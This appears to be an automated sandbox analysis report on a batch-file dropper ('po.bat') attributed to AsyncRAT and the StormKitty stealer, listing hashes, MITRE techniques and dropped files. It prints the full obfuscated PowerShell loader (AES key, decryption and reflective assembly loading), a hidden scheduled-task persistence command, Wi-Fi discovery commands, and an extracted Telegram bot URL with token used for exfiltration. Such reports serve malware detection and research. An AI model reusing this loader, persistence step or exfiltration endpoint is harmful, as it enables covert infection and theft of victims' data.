asyncrat | b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-12-2024 16:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

po.bat
Size

345KB
MD5

25be610e8e3814d3a218e6ab74513af2
SHA1

e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc
SHA256

b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11
SHA512

201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235
SSDEEP

6144:GR5FF+fw1uneHT10sG94hEHdiYOGgmNUgd/RZkOXTGKiTGtiIljFiqzpQJK:05j1unET1zG4E9FgmNUgd/PkOXniTeQw

Score

10^/10

asyncrat stormkitty default discovery execution persistence phishing privilege_escalation rat stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7783849752:AAGmjKBCU097MimSymLmRKxeBKFEEvQt3kM/sendMessage?chat_id=6795436266

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/3220-50-0x000001E9FAAD0000-0x000001E9FAB02000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3220-50-0x000001E9FAAD0000-0x000001E9FAB02000-memory.dmp	family_asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
20	3220	powershell.exe
22	3220	powershell.exe
43	3220	powershell.exe
44	3220	powershell.exe
47	3220	powershell.exe
48	3220	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3968	powershell.exe
2372	powershell.exe
3220	powershell.exe

A potential corporate email address has been identified in the URL: WorldWindProResultsDate2024123141846PMSystemWindows10Pro64BitUsernameAdminCompNameYQRLKYONLanguageenUSAntivirusNotinstalledHardwareCPU12thGenIntelRCoreTMi512400GPUMicrosoftBasicDisplayAdapterRAM16154MBHWIDUnknownPowerNoSystemBattery1Screen1280x720NetworkGatewayIP10.127.0.1InternalIP10.127.0.109ExternalIP181.215.176.83BSSID8e68fccec388DomainsinfoBankLogsNodataCryptoLogsNodataFreakyLogsNodataLogsBookmarks5SoftwareDeviceWindowsproductkeyDesktopscreenshotFileGrabberDatabasefiles6TelegramChannel@XSplinter
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops desktop.ini file(s) 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	powershell.exe
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	powershell.exe
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	powershell.exe
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	powershell.exe
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	powershell.exe
File created	C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
46	pastebin.com
47	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1556	cmd.exe
536	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
2372	powershell.exe
2372	powershell.exe
3968	powershell.exe
3968	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe
Token: 35	3968	powershell.exe
Token: 36	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe
Token: 35	3968	powershell.exe
Token: 36	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	powershell.exe
Token: SeSecurityPrivilege	3968	powershell.exe
Token: SeTakeOwnershipPrivilege	3968	powershell.exe
Token: SeLoadDriverPrivilege	3968	powershell.exe
Token: SeSystemProfilePrivilege	3968	powershell.exe
Token: SeSystemtimePrivilege	3968	powershell.exe
Token: SeProfSingleProcessPrivilege	3968	powershell.exe
Token: SeIncBasePriorityPrivilege	3968	powershell.exe
Token: SeCreatePagefilePrivilege	3968	powershell.exe
Token: SeBackupPrivilege	3968	powershell.exe
Token: SeRestorePrivilege	3968	powershell.exe
Token: SeShutdownPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeSystemEnvironmentPrivilege	3968	powershell.exe
Token: SeRemoteShutdownPrivilege	3968	powershell.exe
Token: SeUndockPrivilege	3968	powershell.exe
Token: SeManageVolumePrivilege	3968	powershell.exe
Token: 33	3968	powershell.exe
Token: 34	3968	powershell.exe
Token: 35	3968	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 2372	4508	cmd.exe	83
PID 4508 wrote to memory of 2372	4508	cmd.exe	83
PID 2372 wrote to memory of 3968	2372	powershell.exe	84
PID 2372 wrote to memory of 3968	2372	powershell.exe	84
PID 2372 wrote to memory of 4896	2372	powershell.exe	87
PID 2372 wrote to memory of 4896	2372	powershell.exe	87
PID 4896 wrote to memory of 1920	4896	WScript.exe	88
PID 4896 wrote to memory of 1920	4896	WScript.exe	88
PID 1920 wrote to memory of 3220	1920	cmd.exe	90
PID 1920 wrote to memory of 3220	1920	cmd.exe	90
PID 3220 wrote to memory of 1556	3220	powershell.exe	94
PID 3220 wrote to memory of 1556	3220	powershell.exe	94
PID 1556 wrote to memory of 2324	1556	cmd.exe	96
PID 1556 wrote to memory of 2324	1556	cmd.exe	96
PID 1556 wrote to memory of 536	1556	cmd.exe	97
PID 1556 wrote to memory of 536	1556	cmd.exe	97
PID 1556 wrote to memory of 1964	1556	cmd.exe	98
PID 1556 wrote to memory of 1964	1556	cmd.exe	98
PID 3220 wrote to memory of 3900	3220	powershell.exe	99
PID 3220 wrote to memory of 3900	3220	powershell.exe	99
PID 3900 wrote to memory of 4324	3900	cmd.exe	101
PID 3900 wrote to memory of 4324	3900	cmd.exe	101
PID 3900 wrote to memory of 1504	3900	cmd.exe	102
PID 3900 wrote to memory of 1504	3900	cmd.exe	102

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\po.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\po.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\po.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_767_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_767.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_767.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_767.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_767.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_767.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops desktop.ini file(s)
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3220
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1556
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2324
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:536
        
        C:\Windows\system32\findstr.exe
        
        findstr All
        7⤵
        
        PID:1964
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4324
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\2aaa12dad31401045ce3f346dfab13e6\msgid.dat

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\System\Process.txt

Filesize
1KB

MD5
7e78460f7ed48487c542f24c716f8f2c

SHA1
f7ce7ecc81d9c75abd3a075f1085a367602c3844

SHA256
0d20f5374d574e459910d676ef7c42b284afd467f4f7e82008ec4dd20b79ea7a

SHA512
ea3969befa7c2d74f8d916816d97ec621c5499c3f1e2addc7aaf166a8bd7bee20f12936be8ecdc1bf09103a55d5f9d2629f9cb13a07329ed96467ee7f4739c84

Download Submit
C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\System\Process.txt

Filesize
2KB

MD5
f0da0b90fdf6188db24da2901e98a98a

SHA1
b1728870fb075e67738b6c0f4188be5d80863d90

SHA256
da3687c0d54a91cfbcb3d4a46b7a5644a5a4bdf65cb8fab551a966af52c411d8

SHA512
d4801b6ef3f20f399a0cad8d6fd1a1ea7ecf8b0b98e9972e3e241598abe2a50ca8f554e719b4cc198c3213a2e585bb30558c985665d135dcfb5068edd873bdb7

Download Submit
C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\System\Process.txt

Filesize
3KB

MD5
39fa84a45e120ffcfc3911aa4a7e0bc5

SHA1
6e0f84912fd12c2f41b7ad0e2006a6c8486f0622

SHA256
09294620a27e267308a274335e8035cd3efc74a42cb63e36b7538ef76fd605eb

SHA512
98ac50994d7da56003ff476a8597dc88c6a1b74796db70b6867360371659e5531acc7c20cb53d299d869779f89a942bc853a1802c434fdc023e224336fe28a08

Download Submit
C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\System\Process.txt

Filesize
3KB

MD5
e90210f8507e0688d83e91bdb34b98c8

SHA1
ca4db1e5d7020449109d0a4efa8b746c467ef5e6

SHA256
94fb3d9afb4dce7ab2040786c07e8c13982fa4c857031463c3ba6c4ba0299de7

SHA512
30f275137f8b4dbf920b15801f54fdf9c12a65843e821ad68099b1d8419604e70d0d19fae5ae8ed49ca09e460e89ccd19b77591aa790156ab51b7c960dc79d9b

Download Submit
C:\Users\Admin\AppData\Local\8020d34c62a15e03a282a4a49399fbe8\Admin@YQRLKYON_en-US\System\Process.txt

Filesize
4KB

MD5
96171668c79f8e1e13828703e442c1e2

SHA1
fc9be54942f52aa6213f02e175552ead5dd7dd6d

SHA256
6696ab0aeebccf546cba247145109fae83be4edbf865b215003a304d3a0fd9bf

SHA512
e46b23b5c40dbff134164383189226470f4a98b206d143ef656d5cd1d6b478413f0a1f7cdfa5d971608f2c6c00f80089ffc5f3430d6ac14326cfc68b80903074

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
773440cd6eb4e778c7d2115d1f231f75

SHA1
4b600aa41fcd267817961c95b104a0717c40e558

SHA256
64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

SHA512
af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cto4kx4m.bqh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_767.bat

Filesize
345KB

MD5
25be610e8e3814d3a218e6ab74513af2

SHA1
e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc

SHA256
b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

SHA512
201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_767.vbs

Filesize
115B

MD5
667a31236f4af110d97573e819797ea3

SHA1
b2da3dec5e8acac46435158e4455d9d592470a1e

SHA256
efc159f9be45487df2058997523995fa5f859e0721c266fac574c62ba7681a54

SHA512
d8379c1f846ff04bccd0004e79901c56f60ad0176e059584f7a93457bd75b1580499a32b540cd23f216509ee935929b7b9049e129d534000ec07aec813abb007

Download Submit
memory/2372-13-0x00000273EEC10000-0x00000273EEC18000-memory.dmp

Filesize
32KB

Download
memory/2372-11-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/2372-10-0x00000273F0E00000-0x00000273F0E22000-memory.dmp

Filesize
136KB

Download
memory/2372-0-0x00007FFE84953000-0x00007FFE84955000-memory.dmp

Filesize
8KB

Download
memory/2372-12-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/2372-14-0x00000273F0DC0000-0x00000273F0E04000-memory.dmp

Filesize
272KB

Download
memory/2372-51-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/3220-50-0x000001E9FAAD0000-0x000001E9FAB02000-memory.dmp

Filesize
200KB

Download
memory/3220-49-0x000001E9FAA90000-0x000001E9FAAD4000-memory.dmp

Filesize
272KB

Download
memory/3220-200-0x000001E9FCE10000-0x000001E9FCE1A000-memory.dmp

Filesize
40KB

Download
memory/3220-206-0x000001E9FCE20000-0x000001E9FCE32000-memory.dmp

Filesize
72KB

Download
memory/3968-16-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/3968-27-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/3968-26-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download
memory/3968-30-0x00007FFE84950000-0x00007FFE85411000-memory.dmp

Filesize
10.8MB

Download